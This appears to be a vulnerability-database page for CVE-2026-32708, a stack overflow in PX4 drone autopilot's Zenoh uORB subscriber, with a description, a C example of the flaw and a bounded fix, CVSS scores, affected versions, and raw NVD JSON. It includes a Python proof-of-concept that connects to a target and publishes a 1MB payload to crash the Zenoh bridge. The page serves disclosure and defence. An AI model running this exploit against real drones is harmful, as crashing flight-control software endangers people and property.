Security Vulnerability Report
CVE-2026-32708 CVSS 7.8 HIGH

CVE-2026-32708

Published: 2026-03-16 14:19:42
Last Modified: 2026-03-17 16:16:23

Description

PX4 autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, the Zenoh uORB subscriber allocates a stack VLA directly from the incoming payload length without bounds. A remote Zenoh publisher can send an oversized fragmented message to force an unbounded stack allocation and copy, causing a stack overflow and crash of the Zenoh bridge task. This vulnerability is fixed in 1.17.0-rc2.
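The bug class described above, shown as an added example that is not PX4's code or the project's actual fix: a receive callback that sizes a stack array from the incoming length, next to a form that validates the length against a fixed buffer first. The names on_sample_vla, on_sample_bounded, deliver and TOPIC_MSG_SIZE are hypothetical, and the 64-byte topic size is an assumed value.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumption: the topic has a fixed serialized size known at build time. */
#define TOPIC_MSG_SIZE 64u

static uint8_t last_delivered[TOPIC_MSG_SIZE]; /* stand-in for the uORB side */
static unsigned delivered, dropped;

static void deliver(const uint8_t *msg, size_t len)
{
    size_t n = len < TOPIC_MSG_SIZE ? len : TOPIC_MSG_SIZE;
    memset(last_delivered, 0, sizeof last_delivered);
    memcpy(last_delivered, msg, n);
    delivered++;
}

/* Pattern from the description: the sender's length sizes a stack array.
 * A length above the task's remaining stack overruns it before any check. */
int on_sample_vla(const uint8_t *payload, size_t len)
{
    uint8_t buf[len];               /* unbounded stack allocation */
    memcpy(buf, payload, len);      /* unbounded copy */
    deliver(buf, len);
    return 0;
}

/* Bounded form: fixed buffer, length validated before any copy. */
int on_sample_bounded(const uint8_t *payload, size_t len)
{
    uint8_t buf[TOPIC_MSG_SIZE];

    if (payload == NULL || len == 0 || len > sizeof buf) {
        dropped++;                  /* count rejects so they can be monitored */
        return -1;
    }
    memcpy(buf, payload, len);
    deliver(buf, len);
    return 0;
}
```

Building with GCC's -Wvla flags every variable-length array, which surfaces this pattern at compile time.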

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:* - VULNERABLE
PX4 Autopilot < 1.17.0-rc2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-32708 PoC - PX4 Autopilot Zenoh uORB Stack Overflow
# This PoC demonstrates sending a malicious oversized fragmented Zenoh message

import zenoh
import struct
import time


def create_malicious_zenoh_message():
    """
    Create a malicious oversized fragmented Zenoh message
    to trigger stack overflow in Zenoh uORB subscriber
    """
    # Maximum payload size to trigger stack overflow
    # Adjust based on target system's stack size
    MALICIOUS_PAYLOAD_SIZE = 1024 * 1024  # 1MB - exceeds typical stack size

    # Create oversized payload
    malicious_payload = b'\x41' * MALICIOUS_PAYLOAD_SIZE

    # Zenoh message structure for fragmented message
    zenoh_header = bytes([0x71])  # Z_ZMSG_FLAG_Z
    zenoh_fragment = zenoh_header + malicious_payload

    return zenoh_fragment


def exploit_cve_2026_32708(target_host='192.168.1.1', target_port=7447):
    """
    Exploit function to trigger the vulnerability
    """
    try:
        # Create Zenoh session with malicious configuration
        config = zenoh.Config()
        config.insert_json5("connect/endpoints", f'["tcp/{target_host}:{target_port}"]')

        session = zenoh.open(config)

        # Create malicious message
        malicious_msg = create_malicious_zenoh_message()

        # Publish to uORB topic that Zenoh bridge subscribes to
        key_expr = "fmu/out/vehicle_command"

        print(f"[*] Sending malicious message ({len(malicious_msg)} bytes) to {key_expr}")
        session.put(key_expr, malicious_msg)

        # Wait for message processing
        time.sleep(2)

        print("[*] Message sent. If vulnerable, Zenoh bridge should crash.")
        session.close()

    except Exception as e:
        print(f"[!] Error: {e}")
        return False

    return True


if __name__ == "__main__":
    print("CVE-2026-32708 PoC - PX4 Autopilot Zenoh uORB Stack Overflow")
    print("=" * 60)
    exploit_cve_2026_32708()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32708", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:41.960", "lastModified": "2026-03-17T16:16:23.157", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "PX4 autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, the Zenoh uORB subscriber allocates a stack VLA directly from the incoming payload length without bounds. A remote Zenoh publisher can send an oversized fragmented message to force an unbounded stack allocation and copy, causing a stack overflow and crash of the Zenoh bridge task. This vulnerability is fixed in 1.17.0-rc2."}, {"lang": "es", "value": "El piloto automático PX4 es una solución de control de vuelo para drones. Antes de la versión 1.17.0-rc2, el suscriptor Zenoh uORB asigna una VLA de pila directamente de la longitud de la carga útil entrante sin límites. Un publicador Zenoh remoto puede enviar un mensaje fragmentado de tamaño excesivo para forzar una asignación y copia de pila sin límites, causando un desbordamiento de pila y el bloqueo de la tarea del puente Zenoh. 
Esta vulnerabilidad se corrige en la versión 1.17.0-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.0", "matchCriteriaId": "2FC2D6F1-D77D-44C2-A99C-55CB5A4474B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "033A0A82-2986-44D5-A712-47B8D43407FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "3F2EA96E-BC3A-42AB-B81B-53D5872B2296"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "1EAC5320-8D94-477D-AB85-144F8218DDFB"}]}]}], "references": [{"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-69g4-hcqf-j45p", 
"source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-69g4-hcqf-j45p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}